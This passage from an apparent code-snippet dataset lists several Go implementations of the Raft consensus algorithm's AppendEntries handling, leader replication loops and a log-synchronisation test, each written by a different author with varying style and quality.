nil\n\t}\n\n\tlog.Printf(\"AppendEntries args: %+v\\ncurrentTerm=%d\\n\", args, node.currentTerm)\n\t// If the AppendEntries RPC is from a higher term then both followers and\n\t// candidates need to be reset.\n\tif args.term > node.currentTerm {\n\t\tnode.updateStateToFollower(args.term)\n\t}\n\n\tif args.term == node.currentTerm {\n\t\tif node.state != follower {\n\t\t\tnode.updateStateToFollower(args.term)\n\t\t}\n\t\t// Reset election timer since we have received a heartbeat from the leader.\n\t\tnode.timeSinceTillLastReset = time.Now()\n\n\t\t// Compare prevLogIndex and prevLogTerm with our own log.\n\t\tif args.prevLogIndex == -1 || (args.prevLogIndex < len(node.log) && args.prevLogTerm == node.log[args.prevLogIndex].term) {\n\t\t\treply.success = true\n\n\t\t\t// Find an existing entry that conflicts with the leader sent entries, and remove everything from it till the end.\n\t\t\tnodeLogIndex := args.prevLogIndex + 1\n\t\t\tleaderLogIndex := 0\n\t\t\tfor {\n\t\t\t\tif nodeLogIndex >= len(node.log) {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\n\t\t\t\tif leaderLogIndex >= len(args.entries) {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\n\t\t\t\t// Found a mismatch so we need to overwrite from this index onwards.\n\t\t\t\tif args.entries[leaderLogIndex].term != node.log[nodeLogIndex].term {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\n\t\t\t\tnodeLogIndex++\n\t\t\t\tleaderLogIndex++\n\t\t\t}\n\n\t\t\t// There are still some log entries which the leader needs to inform us about.\n\t\t\tif leaderLogIndex < len(args.entries) {\n\t\t\t\tlog.Printf(\"The node %d has an old log %+v\", node.id, node.log)\n\t\t\t\tnode.log = append(node.log[:nodeLogIndex], args.entries[leaderLogIndex:]...)\n\t\t\t\tlog.Printf(\"The node %d has a new log %+v\", node.id, node.log)\n\t\t\t}\n\n\t\t\tif args.leaderCommit > node.commitIndex {\n\t\t\t\tnode.commitIndex = intMin(args.leaderCommit, len(node.log)-1)\n\t\t\t\tlog.Printf(\"The commit index node %d has been changed to %d\", node.id, node.commitIndex)\n\t\t\t\t// Indicate to the client that this follower has committed new entries.\n\t\t\t}\n\t\t}\n\n\t\treply.success = true\n\t}\n\treply.term = node.currentTerm\n\t// By default but for readabilty.\n\treply.success = false\n\tlog.Printf(\"AppendEntries reply: %+v\", reply)\n\treturn nil\n}", "func (rf *Raft) AppendEntries(args *AppendEntriesArgs, reply *AppendEntriesReply) {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\tif args.Term > rf.currentTerm {\n\t\trf.stepDownToFollower(args.Term)\n\t}\n\t// TODO: check, this is a new approach to use goroutine\n\tgo func() {\n\t\trf.heartBeatCh <- true\n\t}()\n\treply.Term = rf.currentTerm\n\treply.Success = true\n\n\tif len(args.LogEntries) > 0 {\n\t\t// validate the log, remove duplicate\n\t\treply.Success, reply.LatestLogEntry = rf.appendEntries(args)\n\t}\n\tif args.LeaderCommit > rf.commitIndex {\n\t\trf.commitIndex = min(args.LeaderCommit, rf.getLastLog().Index)\n\t}\n\treturn\n}", "func (rf *Raft) AppendEntries(args *AppendEntriesArgs, reply *AppendEntriesReply) {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\tif rf.state != Follower {\n\t\t\trf.convertToFollower(rf.currentTerm, rf.votedFor)\n\t\t}\n\t}\n\n\treply.Term = rf.currentTerm\n\n\tif args.Term < rf.currentTerm {\n\t\treply.Success = false\n\t} else if len(rf.log) <= args.PrevLogIndex {\n\t\treply.Success = false\n\t\treply.ConflictIndex = len(rf.log) - 1\n\t\treply.ConflictTerm = -1\n\t} else if args.PrevLogIndex == -1 {\n\t\treply.Success = true\n\t} else if rf.log[args.PrevLogIndex].Term != args.PrevLogTerm {\n\t\treply.Success = false\n\n\t\tprevLogTerm := -1\n\t\tif args.PrevLogIndex >= 0 {\n\t\t\tprevLogTerm = rf.log[args.PrevLogIndex].Term\n\t\t}\n\t\tif args.PrevLogTerm != prevLogTerm {\n\t\t\treply.ConflictTerm = prevLogTerm\n\t\t\tfor i := 0; i < len(rf.log); i++ {\n\t\t\t\tif rf.log[i].Term == prevLogTerm {\n\t\t\t\t\treply.ConflictIndex = i\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t} else {\n\t\treply.Success = true\n\t}\n\n\tif reply.Success {\n\t\tfor i := 0; i < len(args.Entries); i++ {\n\t\t\tif args.PrevLogIndex+i+1 >= len(rf.log) {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tif rf.log[args.PrevLogIndex+i+1].Term != args.Entries[i].Term {\n\t\t\t\trf.log = rf.log[:args.PrevLogIndex+i]\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif args.PrevLogIndex < len(rf.log) {\n\t\t\tfor i := 0; i < len(args.Entries); i++ {\n\t\t\t\tif args.PrevLogIndex+i+1 >= len(rf.log) {\n\t\t\t\t\trf.log = append(rf.log, args.Entries[i])\n\t\t\t\t} else {\n\t\t\t\t\trf.log[args.PrevLogIndex+i+1] = args.Entries[i]\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tif args.LeaderCommit > rf.committedIndex {\n\t\t\tif args.LeaderCommit > args.PrevLogIndex+len(args.Entries) {\n\t\t\t\trf.committedIndex = args.PrevLogIndex + len(args.Entries)\n\t\t\t} else {\n\t\t\t\trf.committedIndex = args.LeaderCommit\n\t\t\t}\n\t\t\tif rf.committedIndex >= len(rf.log) {\n\t\t\t\trf.committedIndex = len(rf.log) - 1\n\t\t\t}\n\t\t}\n\t\trf.startApplyLogs()\n\t}\n\n\trf.persist()\n\n\tgo func() {\n\t\tselect {\n\t\tcase <-rf.heartBeatCh:\n\t\tdefault:\n\t\t}\n\t\trf.heartBeatCh <- true\n\t}()\n\n}", "func (rf *Raft) AppendEntries(args *AppendEntriesArgs, reply *AppendEntriesReply) {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tDPrintf(\"hear beat from %v\", args.LeaderId)\n\treply.Term = rf.currentTerm\n\tif rf.currentTerm <= args.Term {\n\t\trf.resetTimer()\n\t}\n\tif rf.currentTerm < args.Term {\n\t\trf.raftState = Follower\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = -1\n\t\trf.persist()\n\t}\n\n\t//rf currentTerm is more update\n\tif args.Term < rf.currentTerm {\n\t\treply.Success = false\n\t\treturn\n\t}\n\tif args.PrevLogIndex < rf.lastIncludedIndex{\n\t\treply.Success = false\n\t\treply.ConflictIndex = rf.lastIncludedIndex + 1\n\t\treturn\n\t}\n\t//if args.PrevLogIndex > 50 {\n\t//DPrintf(\"args is %v, me is %v log len is %v rf lastincluded is %v case: %v\"+\n\t//\t\" commitIndex is %v log is %v\", args, rf.me, len(rf.log), rf.lastIncludedIndex,\n\t//\tlen(rf.log)-1 < rf.subLastIncludedIndex(args.PrevLogIndex), rf.commitIndex, rf.log)\n\t//}\n\t//DPrintf(\"from %v me is %v lastincludeindex is %v args prev is %v\",\n\t//\targs.LeaderId, rf.me, rf.lastIncludedIndex, args.PrevLogIndex)\n\tif len(rf.log)-1 < rf.subLastIncludedIndex(args.PrevLogIndex) ||\n\t\t(rf.log[rf.subLastIncludedIndex(args.PrevLogIndex)].Term != args.PrevLogTerm &&\n\t\t\trf.subLastIncludedIndex(args.PrevLogIndex) != 0) {\n\t\treply.Success = false\n\t\tif len(rf.log)-1 < rf.subLastIncludedIndex(args.PrevLogIndex){\n\t\t\treply.ConflictIndex = rf.addLastIncludedIndex(len(rf.log))\n\t\t} else{\n\t\t\t//faster moving by term, not index, return last index of last term\n\t\t\treply.ConflictTerm = rf.log[rf.subLastIncludedIndex(args.PrevLogIndex)].Term\n\t\t\tfor i := rf.subLastIncludedIndex(args.PrevLogIndex); i >= 0; i--{\n\t\t\t\tif rf.log[i].Term == rf.log[rf.subLastIncludedIndex(args.PrevLogIndex)].Term{\n\t\t\t\t\treply.ConflictIndex = rf.addLastIncludedIndex(i)\n\t\t\t\t}else{\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\treturn\n\t}\n\n\t//when hit this branch mean in PrevLogIndex all commits are matched with the leader\n\t//delete entries not match the PreLogIndex\n\n\t//if len(rf.log) >= args.PrevLogIndex + len(args.Entries){\n\t//\tisMatch := true\n\t//\tfor i := 0; i < len(args.Entries); i++ {\n\t//\t\tif args.Entries[i] != rf.log[i+args.PrevLogIndex+1] {\n\t//\t\t\tisMatch = false\n\t//\t\t}\n\t//\t}\n\t//\tif isMatch == false{\n\t//\t\trf.log = rf.log[0 : args.PrevLogIndex+1]\n\t//\t\trf.log = append(rf.log, args.Entries...)\n\t//\t}\n\t//}else {\n\t//\trf.log = rf.log[0 : args.PrevLogIndex+1]\n\t//\trf.log = append(rf.log, args.Entries...)\n\t//}\n\n\trf.log = rf.log[0 : rf.subLastIncludedIndex(args.PrevLogIndex+1)]\n\treply.Success = true\n\trf.log = append(rf.log, args.Entries...)\n\tif args.LeaderCommit > rf.commitIndex {\n\t\tcommitIndex := min(args.LeaderCommit, rf.addLastIncludedIndex(len(rf.log)-1))\n\t\trf.commitIndex = commitIndex\n\t\trf.notifyApplyCh <- struct{}{}\n\t\t//DPrintf(\"inner appendentires me is %v rf commitindex is %v, args.Leadercommit is %v, \" +\n\t\t//\t\"lastincludedindex is %v log len is %v\", rf.me, rf.commitIndex,\n\t\t//\targs.LeaderCommit, rf.lastIncludedIndex, len(rf.log))\n\t}\n\trf.persist()\n}", "func handleAppendEntries(s *Sailor, state *storage.State, am *appendMessage, leaderId string) (appendReply, error) {\n\t// Check if the node needs to convert to the follower state\n\tif (s.state != follower && am.Term == s.currentTerm) || am.Term > s.currentTerm {\n\t\ts.becomeFollower(am.Term)\n\t}\n\n\trep := appendReply{Term: s.currentTerm, Success: false}\n\t// Reject the RPC if it has the wrong term\n\tif s.currentTerm > am.Term {\n\t\treturn rep, nil\n\t}\n\ts.timer.Reset(new_time()) // The message is from the leader, reset our election-start clock\n\ts.leaderId = leaderId\n\t// Reject the RPC if the position or the term is wrong\n\tif am.PrevLogIndex != 0 && (len(s.log) <= int(am.PrevLogIndex-1) ||\n\t\t(len(s.log) > 0 && s.log[am.PrevLogIndex-1].Term != am.PrevLogTerm)) {\n\t\treturn rep, nil\n\t}\n\n\trep.Success = true // The RPC is valid and the call will succeed\n\n\trep.PrepLower = am.PrevLogIndex + 1\n\trep.ComLower = s.volatile.commitIndex\n\n\t// Loop over the values we're dropping from our log. If we were the leader when\n\t// the values were proposed, then we reply to the client with a set failed message.\n\t// We know we were the leader if we were counting votes for that log entry.\n\tfor i := am.PrevLogIndex; i < uint(len(s.log)); i++ {\n\t\tif s.log[i].votes != 0 {\n\t\t\tfail := messages.Message{}\n\t\t\tfail.Source = s.client.NodeName\n\t\t\tfail.Type = \"setResponse\"\n\t\t\tfail.Error = \"SET FAILED\"\n\t\t\tfail.ID = s.log[i].Id\n\t\t\tfail.Key = s.log[i].Trans.Key\n\t\t\ts.client.SendToBroker(fail)\n\t\t}\n\t}\n\t// Drops the extra entries and adds the new ones\n\ts.log = append(s.log[:am.PrevLogIndex], am.Entries...)\n\t// If we have new values to commit\n\tif am.LeaderCommit > s.volatile.commitIndex {\n\t\t// Choose the min of our log size and the leader's commit index\n\t\tif int(am.LeaderCommit) <= len(s.log) {\n\t\t\ts.volatile.commitIndex = am.LeaderCommit\n\t\t} else {\n\t\t\ts.volatile.commitIndex = uint(len(s.log))\n\t\t}\n\t\t// Actually commit and apply the transactions to the state machine\n\t\tfor s.volatile.lastApplied < s.volatile.commitIndex {\n\t\t\ts.volatile.lastApplied += 1\n\t\t\tstate.ApplyTransaction(s.log[s.volatile.lastApplied-1].Trans)\n\t\t}\n\n\t}\n\trep.PrepUpper = uint(len(s.log))\n\trep.ComUpper = s.volatile.commitIndex\n\treturn rep, nil\n}", "func (rf *Raft) AppendEntries(args *AppendEntriesArgs, reply *AppendEntriesReply) {\n\t// lock\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tlocalTerm := rf.currentTerm\n\tlogSize := len(rf.log)\n\t// init reply. Term to localTerm\n\treply.Term = localTerm\n\treply.PeerId = rf.me\n\treply.Success = false\n\treply.ConflictTerm = -1\n\treply.FirstIndex = -1\n\t// begin to check.\n\t// 1. check term.\n\tDPrintf(\"Peer-%d has reveived new append request: %v, local: term=%d.\", rf.me, *args, localTerm)\n\tif localTerm > args.Term {\n\t\treply.Success = false\n\t\treturn\n\t} else if localTerm < args.Term {\n\t\trf.currentTerm = args.Term\n\t\trf.transitionState(NewTerm)\n\t\tgo func() {\n\t\t\trf.eventChan <- NewTerm\n\t\t}()\n\t}\n\t// 2. process heartbeat.\n\tappendEntriesLen := 0\n\tif args.Entries != nil {\n\t\tappendEntriesLen = len(args.Entries)\n\t}\n\t// localTerm <= args.Term, it should receive heartbeat.\n\tif appendEntriesLen <= 0 || args.Entries[0].Command == nil {\n\t\t// when receive heartbeat, we should turn from Canditate to Follower.\n\t\trf.transitionState(HeartBeat)\n\t\trf.voteFor = args.LeaderId\n\t\tDPrintf(\"Peer-%d try to send heartbeat message.\", rf.me)\n\t\t// to send msg should void deadlock:\n\t\t// A -> B.AppendEntries, B hold the lock and send msg;\n\t\t// B.electionService, B try to hold lock to process, if not, it wait, so can not receive msg.\n\t\t// send message to heartbeat channel.\n\t\tgo func() {\n\t\t\trf.eventChan <- HeartBeat\n\t\t}()\n\t\tDPrintf(\"Peer-%d received heartbeat from peer-%d.\", rf.me, args.LeaderId)\n\t}\n\t// 3. the term is the same, check term of the previous log.\n\tprevLogIndex := args.PrevLogIndex\n\tprevLogTerm := args.PrevLogTerm\n\t// 3.1. check arguments.\n\tif prevLogTerm < 0 || prevLogIndex < 0 || prevLogIndex >= logSize {\n\t\treply.Success = false\n\t\tif prevLogIndex >= logSize && logSize > 0 {\n\t\t\t// if the leader's log are more than follower's\n\t\t\treply.FirstIndex = logSize\n\t\t\t// reply.ConflictTerm = rf.log[logSize-1].Term\n\t\t}\n\t\treturn\n\t}\n\t// 3.2. check previous log's term.\n\tlocalPrevLogTerm := rf.log[prevLogIndex].Term\n\tDPrintf(\"Peer-%d local: prevLogTerm=%d, prevLogIndex=%d.\", rf.me, localPrevLogTerm, prevLogIndex)\n\tif prevLogTerm != localPrevLogTerm {\n\t\treply.Success = false\n\t\t// t[MaTo find the first index of conflict term.\n\t\tconflictTerm := localPrevLogTerm\n\t\treply.ConflictTerm = conflictTerm\n\t\t// TODO: replace this loop with binary search.\n\t\t// The lower boundary is the commintIndex, because all the entries below commitIndex have been commit.\n\t\tfor i := prevLogIndex; i >= rf.commitIndex; i-- {\n\t\t\tif rf.log[i].Term != conflictTerm {\n\t\t\t\treply.FirstIndex = i + 1\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tDPrintf(\"Peer-%d find conflictTerm index, reply=%v, log=%v.\", rf.me, reply, rf.log)\n\t\tif reply.FirstIndex == -1 {\n\t\t\treply.FirstIndex = rf.commitIndex + 1\n\t\t}\n\t\treturn\n\t}\n\t// 4. the previous log's term is the same, we can update commitIndex and append log now.\n\t// 4.1. update commit index.\n\tif args.LeaderCommit > rf.commitIndex {\n\t\tDPrintf(\"Peer-%d set commitIndex=%d, origin=%d, from leader-%d.\", rf.me, args.LeaderCommit, rf.commitIndex, args.LeaderId)\n\t\trf.commitIndex = args.LeaderCommit\n\t}\n\t// 5. begin to append log.\n\t// 5.1. to find the same log between local log and args log.\n\tfirstDiffLogPos := -1\n\tappendPos := prevLogIndex + 1\n\tif appendEntriesLen > 0 {\n\t\tfor argsLogIndex, appendEntry := range args.Entries {\n\t\t\t// localLogsIndex points to local log, its start position is prevLogIndex + 1;\n\t\t\t// argsLogIndex points to args' log entries, start from 0;\n\t\t\t// compaire local log and args log one by one.\n\t\t\tif appendPos < logSize && rf.log[appendPos].Term == appendEntry.Term {\n\t\t\t\tappendPos += 1 // move local log' pointer to next one.\n\t\t\t\tcontinue\n\t\t\t} else {\n\t\t\t\tfirstDiffLogPos = argsLogIndex\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t}\n\t// 5.2. do append.\n\tif firstDiffLogPos != -1 {\n\t\t// cut log to position=appendPos - 1\n\t\tif appendPos > 0 {\n\t\t\trf.log = rf.log[0:appendPos]\n\t\t}\n\t\t// append the different part of args.Entries to log.\n\t\trf.log = append(rf.log, args.Entries[firstDiffLogPos:]...)\n\t\trf.persist()\n\t\tDPrintf(\"Peer-%d append entries to log, log' length=%d, log=%v\\n\", rf.me, len(rf.log), rf.log)\n\t} else {\n\t\tif appendEntriesLen > 0 {\n\t\t\tDPrintf(\"Peer-%d do not append duplicate log.\\n\", rf.me)\n\t\t}\n\t}\n\t// 6. reply.\n\treply.Term = localTerm\n\treply.Success = true\n\treturn\n}", "func (rf *Raft) sendAppendEntriesToMultipleFollowers() {\n for !rf.killed() {\n rf.mu.Lock()\n if rf.state != \"Leader\" {\n DLCPrintf(\"Server (%d) is no longer Leader and stop sending Heart Beat\", rf.me)\n rf.mu.Unlock()\n return\n }\n\n for i := 0; i < len(rf.peers) && rf.state == \"Leader\"; i++ {\n if i == rf.me {\n continue\n }else{\n if rf.nextIndex[i] <= rf.snapshottedIndex {\n go rf.sendInstallSnapshotToOneFollower(i, rf.log[0].Term)\n }else{\n go rf.sendAppendEntriesToOneFollower(i)\n }\n }\n }\n if rf.state != \"Leader\" {\n DLCPrintf(\"Server (%d) is no longer Leader and stop sending Heart Beat\", rf.me)\n rf.mu.Unlock()\n return\n }\n rf.commitEntries()\n rf.mu.Unlock()\n\n time.Sleep(100 * time.Millisecond)\n }\n}", "func TestLeaderSyncFollowerLog(t *testing.T) {\n\tents := []pb.Entry{\n\t\t{},\n\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10},\n\t}\n\tterm := uint64(8)\n\ttests := [][]pb.Entry{\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10}, {Term: 6, Index: 11},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10},\n\t\t\t{Term: 7, Index: 11}, {Term: 7, Index: 12},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5}, {Term: 4, Index: 6}, {Term: 4, Index: 7},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 2, Index: 4}, {Term: 2, Index: 5}, {Term: 2, Index: 6},\n\t\t\t{Term: 3, Index: 7}, {Term: 3, Index: 8}, {Term: 3, Index: 9}, {Term: 3, Index: 10}, {Term: 3, Index: 11},\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tleadStorage := NewMemoryStorage()\n\t\tdefer leadStorage.Close()\n\t\tleadStorage.Append(ents)\n\t\tlead := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, leadStorage)\n\t\tlead.loadState(pb.HardState{Commit: lead.raftLog.lastIndex(), Term: term})\n\t\tfollowerStorage := NewMemoryStorage()\n\t\tdefer followerStorage.Close()\n\t\tfollowerStorage.Append(tt)\n\t\tfollower := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, followerStorage)\n\t\tfollower.loadState(pb.HardState{Term: term - 1})\n\t\t// It is necessary to have a three-node cluster.\n\t\t// The second may have more up-to-date log than the first one, so the\n\t\t// first node needs the vote from the third node to become the leader.\n\t\tn := newNetwork(lead, follower, nopStepper)\n\t\tn.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\t// The election occurs in the term after the one we loaded with\n\t\t// lead.loadState above.\n\t\tn.send(pb.Message{From: 3, To: 1, Type: pb.MsgVoteResp, Term: term + 1})\n\n\t\tn.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\t\tif g := diffu(ltoa(lead.raftLog), ltoa(follower.raftLog)); g != \"\" {\n\t\t\tt.Errorf(\"#%d: log diff:\\n%s\", i, g)\n\t\t}\n\t}\n}", "func (r *Raft) appendEntries(rpc RPC, a *AppendEntriesRequest) (transition bool) {\n\t// Setup a response\n\tresp := &AppendEntriesResponse{\n\t\tTerm: r.getCurrentTerm(),\n\t\tLastLog: r.getLastLogIndex(),\n\t\tSuccess: false,\n\t}\n\tvar err error\n\tdefer rpc.Respond(resp, err)\n\n\t// Ignore an older term\n\tif a.Term < r.getCurrentTerm() {\n\t\terr = errors.New(\"obsolete term\")\n\t\treturn\n\t}\n\n\t// Increase the term if we see a newer one, also transition to follower\n\t// if we ever get an appendEntries call\n\tif a.Term > r.getCurrentTerm() || r.getState() != Follower {\n\t\tr.currentTerm = a.Term\n\t\tresp.Term = a.Term\n\n\t\t// Ensure transition to follower\n\t\ttransition = true\n\t\tr.setState(Follower)\n\t}\n\n\t// Verify the last log entry\n\tvar prevLog Log\n\tif a.PrevLogEntry > 0 {\n\t\tif err := r.logs.GetLog(a.PrevLogEntry, &prevLog); err != nil {\n\t\t\tr.logW.Printf(\"Failed to get previous log: %d %v\",\n\t\t\t\ta.PrevLogEntry, err)\n\t\t\treturn\n\t\t}\n\t\tif a.PrevLogTerm != prevLog.Term {\n\t\t\tr.logW.Printf(\"Previous log term mis-match: ours: %d remote: %d\",\n\t\t\t\tprevLog.Term, a.PrevLogTerm)\n\t\t\treturn\n\t\t}\n\t}\n\n\t// Add all the entries\n\tfor _, entry := range a.Entries {\n\t\t// Delete any conflicting entries\n\t\tif entry.Index <= r.getLastLogIndex() {\n\t\t\tr.logW.Printf(\"Clearing log suffix from %d to %d\",\n\t\t\t\tentry.Index, r.getLastLogIndex())\n\t\t\tif err := r.logs.DeleteRange(entry.Index, r.getLastLogIndex()); err != nil {\n\t\t\t\tr.logE.Printf(\"Failed to clear log suffix: %w\", err)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\n\t\t// Append the entry\n\t\tif err := r.logs.StoreLog(entry); err != nil {\n\t\t\tr.logE.Printf(\"Failed to append to log: %w\", err)\n\t\t\treturn\n\t\t}\n\n\t\t// Update the lastLog\n\t\tr.setLastLogIndex(entry.Index)\n\t}\n\n\t// Update the commit index\n\tif a.LeaderCommitIndex > 0 && a.LeaderCommitIndex > r.getCommitIndex() {\n\t\tidx := min(a.LeaderCommitIndex, r.getLastLogIndex())\n\t\tr.setCommitIndex(idx)\n\n\t\t// Trigger applying logs locally\n\t\tr.commitCh <- commitTuple{idx, nil}\n\t}\n\n\t// Set success\n\tresp.Success = true\n\treturn\n}", "func (r *Raft) setupAppendEntries(s *followerReplication, req *pb.AppendEntriesRequest, nextIndex, lastIndex uint64) error {\n\treq.Term = s.currentTerm\n\treq.Leader = r.transport.EncodePeer(r.localID, r.localAddr)\n\treq.LeaderCommitIndex = r.getCommitIndex()\n\tif err := r.setPreviousLog(req, nextIndex); err != nil {\n\t\treturn err\n\t}\n\tif err := r.setNewLogs(req, nextIndex, lastIndex); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (rf *Raft) AppendEntries(args *AppendEntriesArgs, reply *AppendEntriesReply) {\n\n\trf.mux.Lock() //CS accessing raft DS variables\n\treply.Term = rf.currTerm //default reply values\n\n\tif rf.currTerm <= args.Term {\n\t\trf.logger.Printf(\"received valid heartbeat from leader %v\", args.LeaderId)\n\t\trf.currTerm = args.Term\n\t\treply.Term = rf.currTerm //update terms\n\n\t\t//Acknowledge higher current leader. Reset to follower\n\t\trf.role = Follower\n\t\trf.numVotes = 0\n\t\trf.votedFor = -1\n\t\trf.elecTimer.Reset(time.Duration(rand.Intn(RANGE)+LOWER) * time.Millisecond)\n\t\trf.logger.Printf(\"resetting to follower on getting heartbeat from %v \\n\", args.LeaderId)\n\n\t}\n\trf.mux.Unlock()\n}", "func (r *Raft) callAppendEntries(server int, args appendEntriesArgs, reply *appendEntriesReply) bool {\n\t// When there are no peers, return a test response, if any.\n\tif len(r.peers) == 0 {\n\t\t// Under test, return injected reply.\n\t\tglog.V(2).Infof(\"Under test, returning injected reply %v\", reply)\n\t\tif r.testAppendentriessuccess {\n\t\t\t*reply = *r.testAppendentriesreply\n\t\t}\n\t\treturn r.testAppendentriessuccess\n\t}\n\tok := r.peers[server].Call(\"Raft.AppendEntries\", args, reply)\n\treturn ok\n}", "func appendEntriesUntilSuccess(raft *spec.Raft, PID int) *responses.Result {\n var result *responses.Result\n var retries int\n\n // If last log index >= nextIndex for a follower,\n // send log entries starting at nextIndex.\n // (??) Otherwise set NextIndex[PID] to len(raft.Log)-1\n if len(raft.Log)-1 < raft.NextIndex[PID] {\n log.Printf(\"[PUTENTRY-X]: [len(raft.Log)-1=%d] [raft.NextIndex[PID]=%d]\\n\", len(raft.Log)-1, raft.NextIndex[PID])\n raft.NextIndex[PID] = len(raft.Log) - 1\n }\n\n log.Printf(\"[PUTENTRY->]: [PID=%d]\", PID)\n for {\n // Regenerate arguments on each call, because\n // raft state may have changed between calls\n spec.RaftRWMutex.RLock()\n args := raft.GetAppendEntriesArgs(&self)\n args.PrevLogIndex = raft.NextIndex[PID] - 1\n args.PrevLogTerm = spec.GetTerm(&raft.Log[args.PrevLogIndex])\n args.Entries = raft.Log[raft.NextIndex[PID]:]\n config.LogIf(\n fmt.Sprintf(\"appendEntriesUntilSuccess() to [PID=%d] with args: T:%v, L:%v, PLI:%v, PLT:%v, LC:%v\",\n PID,\n args.Term,\n args.LeaderId,\n args.PrevLogIndex,\n args.PrevLogTerm,\n args.LeaderCommit,\n ),\n config.C.LogAppendEntries)\n spec.RaftRWMutex.RUnlock()\n result = CallAppendEntries(PID, args)\n log.Println(result)\n\n // Success! Increment next/matchIndex as a function of our inputs\n // Otherwise, decrement nextIndex and try again.\n spec.RaftRWMutex.Lock()\n if result.Success {\n raft.MatchIndex[PID] = args.PrevLogIndex + len(args.Entries)\n raft.NextIndex[PID] = raft.MatchIndex[PID] + 1\n spec.RaftRWMutex.Unlock()\n return result\n }\n\n // Decrement NextIndex if the failure was due to log consistency.\n // If not, update our term and step down\n if result.Term > raft.CurrentTerm {\n raft.CurrentTerm = result.Term\n raft.Role = spec.FOLLOWER\n }\n\n if result.Error != responses.CONNERROR {\n raft.NextIndex[PID] -= 1\n spec.RaftRWMutex.Unlock()\n continue\n }\n\n if retries > 5 {\n spec.RaftRWMutex.Unlock()\n return &responses.Result{Success: false, Error: responses.CONNERROR}\n }\n\n retries++\n time.Sleep(time.Second)\n spec.RaftRWMutex.Unlock()\n }\n}", "func (rf *Raft) sendAppendEntries(server int, args *AppendEntriesArgs, reply *AppendEntriesReply) bool {\n\targs.LeaderID = rf.me\n\n\t// figure out prevLogIndex based on entries passed in\n\t// otherwise they are the commit index of the leader if we are sending no logs\n\t// (so leader still finds out we're behind)\n\t// otherwise defaults to 0\n\tif len(args.LogEntries) > 0 && args.LogEntries[0].Index != 1 {\n\t\targs.PrevLogIndex = args.LogEntries[0].Index - 1\n\t} else if len(args.LogEntries) == 0 && rf.commitIndex > 0 {\n\t\targs.PrevLogIndex = rf.commitIndex\n\t}\n\n\t// if we have a nonzero PrevLogIndex (i.e. the condition above just set it),\n\t// retrieve it either from our log or our snapshot\n\tif args.PrevLogIndex > 0 {\n\t\traftLogIdx := rf.getTrimmedLogIndex(args.PrevLogIndex)\n\t\tif raftLogIdx == -1 {\n\t\t\trf.Log(LogDebug, \"AppendEntries retrieving PrevLogTerm from snapshot since index\", args.PrevLogIndex, \"not present in log\")\n\t\t\targs.PrevLogTerm = rf.lastIncludedTerm\n\t\t} else {\n\t\t\targs.PrevLogTerm = rf.log[raftLogIdx].Term\n\t\t}\n\t}\n\n\tok := rf.peers[server].Call(\"Raft.AppendEntries\", args, reply)\n\treturn ok\n}", "func (s *raftServer) handleFollowers(followers []int, nextIndex *utils.SyncIntIntMap, matchIndex *utils.SyncIntIntMap, aeToken *utils.SyncIntIntMap) {\n\tfor s.State() == LEADER {\n\t\tfor _, f := range followers {\n\t\t\tlastIndex := s.localLog.TailIndex()\n\t\t\tn, ok := 